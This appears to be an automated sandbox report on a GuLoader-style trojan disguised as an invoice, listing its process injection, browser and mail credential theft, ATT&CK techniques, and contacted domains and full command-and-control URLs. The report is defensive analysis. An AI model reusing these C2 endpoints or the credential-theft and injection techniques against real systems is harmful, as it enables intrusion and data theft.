    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtAllocateVirtualMemory: Direct from: 0x776D3BBCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtQueryInformationToken: Direct from: 0x776D2BCCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtOpenFile: Direct from: 0x776D2CECJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtWriteVirtualMemory: Direct from: 0x776D482CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtProtectVirtualMemory: Direct from: 0x776D2EBCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtCreateUserProcess: Direct from: 0x776D363CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtQueryInformationProcess: Direct from: 0x776D2B46Jump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtResumeThread: Direct from: 0x776D2EDCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtSetInformationThread: Direct from: 0x776C6319Jump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtAllocateVirtualMemory: Direct from: 0x776D480CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtQueryAttributesFile: Direct from: 0x776D2D8CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtSetInformationThread: Direct from: 0x776D2A6CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtCreateKey: Direct from: 0x776D2B8CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtClose: Direct from: 0x776D2A8C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtQuerySystemInformation: Direct from: 0x776D47ECJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtReadFile: Direct from: 0x776D29FCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtQuerySystemInformation: Direct from: 0x776D2D1CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtAllocateVirtualMemory: Direct from: 0x776D2B1CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtResumeThread: Direct from: 0x776D35CCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtOpenKeyEx: Direct from: 0x776D2ABCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtDelayExecution: Direct from: 0x776D2CFCJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtProtectVirtualMemory: Direct from: 0x776C7A4EJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtReadVirtualMemory: Direct from: 0x776D2DACJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtSetInformationProcess: Direct from: 0x776D2B7CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtMapViewOfSection: Direct from: 0x776D2C3CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtWriteVirtualMemory: Direct from: 0x776D2D5CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtNotifyChangeKey: Direct from: 0x776D3B4CJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: NULL target: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeSection loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEThread register set: target process: 6596Jump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEThread APC queued: target process: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeProcess created: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"Jump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .Program Manager
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0

    Stealing of Sensitive Information

    barindex
    Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    1
    OS Credential Dumping
    321
    Security Software Discovery
    Remote Services1
    Email Collection
    11
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
    Process Injection
    12
    Virtualization/Sandbox Evasion
    LSASS Memory12
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Archive Collected Data
    3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Abuse Elevation Control Mechanism
    1
    Access Token Manipulation
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin Shares1
    Data from Local System
    4
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    DLL Side-Loading
    312
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object Model1
    Clipboard Data
    5
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets2
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Abuse Elevation Control Mechanism
    Cached Domain Credentials14
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
    Obfuscated Files or Information
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540403 Sample: FACTURA  A-7507_H1758.exe Startdate: 23/10/2024 Architecture: WINDOWS Score: 96 32 www.ruarlo.xyz 2->32 34 xtelify.tech 2->34 36 22 other IPs or domains 2->36 50 Multi AV Scanner detection for submitted file 2->50 52 Yara detected GuLoader 2->52 54 Switches to a custom stack to bypass stack traces 2->54 10 FACTURA  A-7507_H1758.exe 2 35 2->10         started        signatures3 56 Performs DNS queries to domains with low reputation 32->56 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 10->30 dropped 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->68 70 Tries to detect Any.run 10->70 14 FACTURA  A-7507_H1758.exe 6 10->14         started        signatures6 process7 dnsIp8 44 drive.usercontent.google.com 142.250.176.193, 443, 49791 GOOGLEUS United States 14->44 46 drive.google.com 142.250.80.110, 443, 49790 GOOGLEUS United States 14->46 72 Tries to detect Any.run 14->72 74 Maps a DLL or memory area into another process 14->74 18 vCWtwarpbXUl.exe 14->18 injected signatures9 process10 signatures11 48 Found direct / indirect Syscall (likely to bypass EDR) 18->48 21 ROUTE.EXE 13 18->21         started        process12 signatures13 58 Tries to steal Mail credentials (via file / registry access) 21->58 60 Tries to harvest and steal browser information (history, passwords, etc) 21->60 62 Modifies the context of a thread in another process (thread injection) 21->62 64 3 other signatures 21->64 24 vCWtwarpbXUl.exe 21->24 injected 28 firefox.exe 21->28         started        process14 dnsIp15 38 www.ruarlo.xyz 162.0.231.203, 49797, 49798, 49799 NAMECHEAP-NETUS Canada 24->38 40 estrela-b.online 162.241.63.77, 49805, 49806, 49807 UNIFIEDLAYER-AS-1US United States 24->40 42 11 other IPs or domains 24->42 66 Found direct / indirect Syscall (likely to bypass EDR) 24->66 signatures16

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    FACTURA A-7507_H1758.exe37%ReversingLabsWin32.Trojan.Generic
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    estrela-b.online
    162.241.63.77
    truefalse
      unknown
      www.bigliaserramenti.com
      75.2.19.62
      truefalse
        unknown
        xtelify.tech
        84.32.84.32
        truefalse
          unknown
          www.ruarlo.xyz
          162.0.231.203
          truetrue
            unknown
            drive.usercontent.google.com
            142.250.176.193
            truefalse
              unknown
              www.1-mine.online
              172.67.148.133
              truefalse
                unknown
                www.theawareness.shop
                172.67.177.220
                truefalse
                  unknown
                  www.russe-trykk.online
                  185.134.245.113
                  truefalse
                    unknown
                    www.caprinaday.net
                    62.149.128.45
                    truefalse
                      unknown
                      refs4refs.info
                      3.33.130.190
                      truefalse
                        unknown
                        binacamasala.com
                        3.33.130.190
                        truefalse
                          unknown
                          drive.google.com
                          142.250.80.110
                          truefalse
                            unknown
                            www.innovators.group
                            13.248.169.48
                            truefalse
                              unknown
                              www.gokulmohan.online
                              104.21.64.124
                              truefalse
                                unknown
                                www.how2.guru
                                13.248.169.48
                                truefalse
                                  unknown
                                  wrl-llc.net
                                  3.33.130.190
                                  truefalse
                                    unknown
                                    ghs.googlehosted.com
                                    142.251.40.243
                                    truefalse
                                      unknown
                                      www.lichnyyrost.online
                                      194.58.112.174
                                      truefalse
                                        unknown
                                        www.wrl-llc.net
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.binacamasala.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.3bbfibre3app.net
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.estrela-b.online
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.refs4refs.info
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.xtelify.tech
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.russe-trykk.online/13t3/?2rul-=OPGGyibZykz1HQ+fwNDr+1YpMJUD6qxq+hpAjJgj1ZR94MAkLt42BGXqMjTev/m9FIbjW4eTPcRZap/xAhCWotsEASV9n/5Kf2dVcxkz55MgVuVRQ72L8tA=&Hh=g6BlOfalse
                                                      unknown
                                                      http://www.binacamasala.com/e0v8/false
                                                        unknown
                                                        http://www.refs4refs.info/2x6z/?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlOfalse
                                                          unknown
                                                          http://www.lichnyyrost.online/3ld1/false
                                                            unknown
                                                            http://www.1-mine.online/u1q9/?Hh=g6BlO&2rul-=jd3Av2k5V8Eau16mgcfaPd8VebuAL1FcJ0MaInc68HOQ7ZBrvq4ejSFdl4VVlO0+8Eq38X9/B8LMXqH/bNKlbEK/GZjnRsE0t8/pdXuVmtOQpH7wXf7Q+zg=false
                                                              unknown
                                                              http://www.3bbfibre3app.net/xb3p/false
                                                                unknown
                                                                http://www.1-mine.online/u1q9/false
                                                                  unknown
                                                                  http://www.refs4refs.info/2x6z/false
                                                                    unknown
                                                                    http://www.estrela-b.online/65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g=false
                                                                      unknown
                                                                      http://www.lichnyyrost.online/3ld1/?Hh=g6BlO&2rul-=CxEsl70ByyFCVrEmQ1H576bbPcYyg9sIwSrFamSzPlGZOs8aE6QFujQOfXywaJwNxcqmSbu90P/WMPRiAk1blYMq9yYTo32NmbjkK65nzP/wEdpsGvsZrfc=false
                                                                        unknown
                                                                        http://www.theawareness.shop/wjz2/?2rul-=Ze+HptNr85yw14c+us2AC2dw1a7i9e00/foFqz1kUabDhzphc/VO6YYTNbrnHL/5cJOwek587J0vYmBCPQ4ypnI0Vgcg70qX2rjEYXT5uSwLlvVTAHZgxGM=&Hh=g6BlOfalse
                                                                          unknown
                                                                          http://www.innovators.group/6fde/false
                                                                            unknown
                                                                            http://www.bigliaserramenti.com/ygv5/false
                                                                              unknown
                                                                              http://www.how2.guru/7eim/?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlOfalse
                                                                                unknown
                                                                                http://www.xtelify.tech/yzuf/false
                                                                                  unknown
                                                                                  http://www.ruarlo.xyz/443n/?Hh=g6BlO&2rul-=SBUFO7UKbQxT/A0NMCw1slRydQol8mxlPD8CditPqx9i+IWA5JxkazMedHBluKiV/JkaYuM+MOSFojVsVdVmUJrzgHDhlyielwZPRH6/6joZww29waA6pwk=false
                                                                                    unknown
                                                                                    http://www.wrl-llc.net/n7zc/?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE=false
                                                                                      unknown
                                                                                      http://www.gokulmohan.online/rfuo/false
                                                                                        unknown
                                                                                        http://www.wrl-llc.net/n7zc/false
                                                                                          unknown
                                                                                          http://www.innovators.group/6fde/?2rul-=nbGTuLemKRTpMBhECM1mMcTVmibgynjed6008TvXOLJMhaVDWlSxtENlCtfhfXIYxXqpopSgMtQMvB67FBGeOiwcmCMnIoT/zPipv8Zc3bHdVtIwetv/s5E=&Hh=g6BlOfalse
                                                                                            unknown
                                                                                            http://www.russe-trykk.online/13t3/false
                                                                                              unknown
                                                                                              http://www.caprinaday.net/pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS+CBDl0e/03G6vIGgM2DOx4ZCTRM54bCOA7z+XcSGAiseRvin1n9lPpnkGa0LOYYd0oIGRqFGq723QGUcE=&Hh=g6BlOfalse
                                                                                                unknown
                                                                                                http://www.estrela-b.online/65n9/false
                                                                                                  unknown
                                                                                                  http://www.how2.guru/7eim/false
                                                                                                    unknown
                                                                                                    http://www.gokulmohan.online/rfuo/?Hh=g6BlO&2rul-=HttO6gilRPhQm5AaUYCTEe/GFzQ3JRW7tnq3sC1VQlloj67/9n3YrtONKlQmdJDOXt5dm9a5cNA5akyMA8hzjxd/lkJNPaGIP3HcLzqJj36WiuTl2EhOSjI=false
                                                                                                      unknown
                                                                                                      http://www.bigliaserramenti.com/ygv5/?Hh=g6BlO&2rul-=iXc1WEJQd/Gahx7+3W11/RKNDsT+DV4H4y6OEj3K8d5Enxayz0VfmTOd+atgJRAuX8UuGK7zkF0xfNQrHCEKQuis9q2uRBiLjPiUjFzh2kkhFDo8hKapbBo=false
                                                                                                        unknown
                                                                                                        http://www.theawareness.shop/wjz2/false
                                                                                                          unknown
                                                                                                          http://www.ruarlo.xyz/443n/false
                                                                                                            unknown
                                                                                                            http://www.3bbfibre3app.net/xb3p/?2rul-=+HG6aiFxTvlSzQoIs9ZJ3PSkAiypA9aaBhm9bacr778ozHX/qp3/mrPcWfQQ4m8pKd5uzW3Q1BNoTzb8AReS/5N/dAP+OtFAus01fnFx169lP7D5+vQ5ltg=&Hh=g6BlOfalse
                                                                                                              unknown
                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                              https://www.reg.ru/domain/new/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_lROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://duckduckgo.com/chrome_newtabROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drfalse
                                                                                                                  unknown
                                                                                                                  https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drfalse
                                                                                                                    unknown
                                                                                                                    https://cdn.hostinger.com/hostinger-academy/dns/domain-default-img.svgROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://www.reg.ru/dedicated/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_laROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://duckduckgo.com/ac/?q=E-1658-o.4.drfalse
                                                                                                                          unknown
                                                                                                                          https://reg.ruROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://parking.reg.ru/script/get_domain_data?domain_name=www.lichnyyrost.online&rand=ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-websiROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.caprinaday.net:80/pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroSROUTE.EXE, 00000004.00000002.30463409490.0000000003E44000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000003894000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.26992521288.0000000035594000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDFACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.gopher.ftp://ftp.FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.gokulmohan.online/rfuo/?Hh=g6BlO&amp;2rul-=HttO6gilRPhQm5AaUYCTEe/GFzQ3JRW7tnq3sC1VQlloj6ROUTE.EXE, 00000004.00000002.30463409490.000000000511C000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004B6C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.google.comFACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://www.reg.ru/whois/?check=&dname=www.lichnyyrost.online&amp;reg_source=parking_autoROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdFACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://drive.google.com/FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004F16000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://apis.google.comFACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.3bbfibre3app.net/xb3p/?2rul-=ROUTE.EXE, 00000004.00000002.30463409490.00000000052AE000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004CFE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.domeneshop.no/whoisROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30463409490.000000000461E000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.000000000406E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
